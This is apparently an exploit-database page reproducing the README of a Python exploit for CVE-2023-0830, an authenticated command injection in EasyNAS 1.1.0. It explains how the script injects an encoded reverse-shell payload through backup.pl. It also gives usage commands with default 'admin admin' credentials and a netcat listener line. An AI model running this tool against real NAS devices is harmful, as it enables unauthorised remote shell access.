Exploit for Command Injection in Easynas CVE-2023-0830

Name: Exploit for Command Injection in Easynas CVE-2023-0830
Rating: 5 (390 reviews)
2023-06-29 | CVSS 5.3
## https://sploitus.com/exploit?id=34AE7FD3-84D3-54C7-AF16-ADAFD46E2ABD
# CVE-2023-0830: EasyNAS 1.1.0 Authenticated OS Command Injection Exploit

This Python script is a powerful exploit for EasyNAS version 1.1.0 with enhanced functionality, including an integrated listener. The vulnerability exploited is a command injection flaw, which requires authentication.

The script establishes a session with the target server, then sends a login request with user-provided credentials. Upon successful authentication, the script constructs a payload that, when executed, opens a reverse shell connection to a user-specified IP and port. This payload is URL and Base64 encoded and then injected into the `backup.pl` file on the server via a crafted GET request.

## CVE: CVE-2023-0830

## Exploit Author
Ivan Spiridonov (xbz0n)
https://xbz0n.sh

## Vendor home page 
[https://www.easynas.org](https://www.easynas.org)

## Features
- Integrated reverse shell listener - no need for a separate netcat process
- Automatic IP address detection for listener
- Option to use different shell types (bash, sh, python)
- Support for both HTTP and HTTPS
- Support for external listeners

## Usage

### Basic usage with integrated listener (recommended):
```bash
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
```

### Using external listener (start nc -lvnp 4444 first):
```bash
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
```

### Options:
```
--mode {shell,reverse}    Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS        IP address for the reverse shell listener (auto-detected by default)
--lport PORT              Port for the reverse shell listener (default: 4444)
--protocol {http,https}   Protocol to use (default: https)
--verbose                 Enable verbose output
--shell {bash,sh,python}  Specify the shell type to use with integrated listener (default: bash)
```

## Dependencies
- Python 3
- Requests library

## Disclaimer
This script is for educational purposes and authorized penetration testing only. Always seek explicit permission before running any penetration tests against a network or system.

Please use responsibly.